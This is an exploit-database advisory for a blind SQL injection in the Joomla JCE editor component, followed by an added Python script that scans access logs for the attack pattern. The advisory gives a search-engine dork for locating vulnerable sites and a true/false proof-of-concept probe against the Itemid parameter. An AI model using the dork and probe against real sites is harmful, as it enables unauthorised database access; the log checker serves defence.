Joomla! Component joomlacontenteditor - Blind SQL Injection

Author: eidelweiss
type: webapps
platform: php
date_added: 2011-04-09  
date_updated: 2017-01-09  
verified: 0  
application_url: http://www.exploit-db.complg_jce_15711.zip  

raw file: 17136.txt  
===================================================================
  joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================

Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  Blind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"


References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html


===================================================================

Description:

JCE makes creating and editing Joomla!® content easy. Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...

===================================================================

    exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

    Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False
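
For defenders, a log check for the request pattern shown above. This is an added example, not part of the original advisory: it flags com_jce requests whose Itemid is not a plain unsigned integer or is supplied more than once. The log format, the sample lines and the function name are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined-log style (documentation IPs, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [09/Apr/2011:10:00:01 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120
192.0.2.44 - - [09/Apr/2011:10:00:05 +0000] "GET /index.php?option=com_jce&Itemid=-8 HTTP/1.1" 200 1830
192.0.2.44 - - [09/Apr/2011:10:00:06 +0000] "GET /index.php?option=com_jce&Itemid=8%20junk HTTP/1.1" 200 1830
198.51.100.7 - - [09/Apr/2011:10:01:00 +0000] "GET /index.php?option=com_content&Itemid=-8 HTTP/1.1" 200 900
198.51.100.9 - - [09/Apr/2011:10:02:00 +0000] "GET /index.php?option=com_jce&Itemid=8&Itemid=-8 HTTP/1.1" 200 1830
this line is not an access-log entry
"""

# Client IP and request target from one access-log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) [^"]*" \d{3} ')
# Assumption: a legitimate Itemid is a short unsigned integer.
PLAIN_ID = re.compile(r"[0-9]{1,10}")


def suspicious_jce_requests(log_text):
    """Return [(client_ip, decoded Itemid values)] for com_jce requests
    whose Itemid is not a plain integer or appears more than once."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not request entries
        # parse_qs percent-decodes values, so encoded input is compared in clear form
        params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if "com_jce" not in params.get("option", []):
            continue  # only the component named in the advisory
        values = params.get("Itemid", [])
        malformed = [v for v in values if not PLAIN_ID.fullmatch(v)]
        if malformed or len(values) > 1:
            hits.append((m.group("ip"), values))
    return hits


if __name__ == "__main__":
    for ip, values in suspicious_jce_requests(SAMPLE_LOG):
        print(f"{ip} sent com_jce request with Itemid={values}")
```

Only query-string parameters are visible in an access log; parameters sent in a POST body need the same check at the application or WAF layer.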


====================================================================

    Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================